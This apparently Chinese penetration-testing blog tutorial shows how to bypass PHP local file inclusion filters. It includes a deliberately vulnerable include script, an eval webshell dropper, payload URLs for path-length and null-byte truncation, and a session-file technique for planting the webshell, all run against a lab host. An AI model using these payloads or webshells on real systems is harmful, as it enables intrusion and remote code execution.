• 欢迎访问行云博客,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,欢迎加入行云博客 QQ群
  • 本站广招各类优秀作者,详情可以加群联系
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏行云博客吧

任意文件包含漏洞的绕过方式

web渗透 行云 3个月前 (08-23) 223次浏览 已收录 0个评论 扫描二维码

前期准备

file.php代码

<?php
    $a = $_GET['a'];
    include($a.'.html');
 ?>

hack.php代码

<?php 
fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"]);?>');
?>

长目录截断

原理

在windows下目录最大长度为256字节,linux下为4096字节,其后面超出部分被丢弃。

正常访问
任意文件包含漏洞的绕过方式-行云博客

payload

使用

1
.

绕过

http://192.168.232.128/file.php?a=hack.php.......................................................................................................................................................................................................................................................

成功生成木马文件
任意文件包含漏洞的绕过方式-行云博客
蚁剑连接
任意文件包含漏洞的绕过方式-行云博客

使用

1
./

绕过

http://192.168.232.128/file.php?a=hack.php././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

任意文件包含漏洞的绕过方式-行云博客
PS:当这些符号被过滤时,我们可以尝试URL编码绕过。即当“.”和“./”被过滤时,我们可以尝试使用URL编码绕过“.”–>%2E,“/”–>%2F

%00截断

原理

php基于c语言,是以0字符进行结尾的,所以可以用%00进行截断,之后的字符就不会再读取

条件:

magic_quotes_gpc=off

php<5.3.4

payload

1
http://192.168.232.128/file.php?a=hack.php%00

任意文件包含漏洞的绕过方式-行云博客

基于session机制传马

条件:

知道session的存储位置(或者通过phpinfo获取到存储位置)
session的值可控
存在本地文件包含漏洞

设置session的PHP文件

<?php
session_start();
$ctfs=$_GET['s'];
$_SESSION["username"]=$ctfs;
?>

payload

1
http://192.168.232.128/se.php?s=&lt;?php fputs(fopen('shell.php','w'),'&lt;?php eval($_POST["cmd"]);?&gt;');?&gt;

F12通过network找到cookie中的PHPSESSID
任意文件包含漏洞的绕过方式-行云博客

然后通过之前的file.php文件去包含session存放的文件

1
http://192.168.232.128/file.php?a=../tmp/tmp/sess_8e2fe1323579620d07c94cfd568be488%00

任意文件包含漏洞的绕过方式-行云博客
木马生成成功
任意文件包含漏洞的绕过方式-行云博客

总结

可能的绕过方式

  • 双写绕过
  • 使用绝对路径
  • 对于Windows系统可以使用反斜杠 \
  • 编码绕过
  • 使用伪协议
  • 等等…

行云博客 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。 本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。 如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我(admin@xy586.top)联系处理。敬请谅解!

喜欢 (0)
[行云博客]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址